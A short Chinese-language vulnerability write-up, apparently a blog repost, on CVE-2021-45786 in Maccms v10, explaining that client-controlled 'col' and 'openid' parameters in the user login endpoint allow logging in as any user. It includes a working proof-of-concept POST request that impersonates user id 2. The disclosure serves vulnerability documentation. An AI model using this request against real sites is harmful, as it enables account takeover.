CVE-2021-45786:maccms任意用户登录


简介

在Maccms v10中,攻击者可以通过向/index.php/user/login发送“col”和“openid”参数实现越权登陆。

受影响版本

名称版本语言更新
Maccms10.0PHP*

漏洞分析

/application/common/model/user.php中的320行“col”和“openid”参数客户端可控。(可实现登录任意id用户)
CVE-2021-45786:maccms任意用户登录

漏洞复现

POC


POST /index.php/user/login

col=user_id&openid=2

CVE-2021-45786:maccms任意用户登录

原创文章,作者:bd101bd101,如若转载,请注明出处:https://blog.ytso.com/273239.html

(0)
上一篇 2022年7月10日
下一篇 2022年7月10日

相关推荐

发表回复

登录后才能评论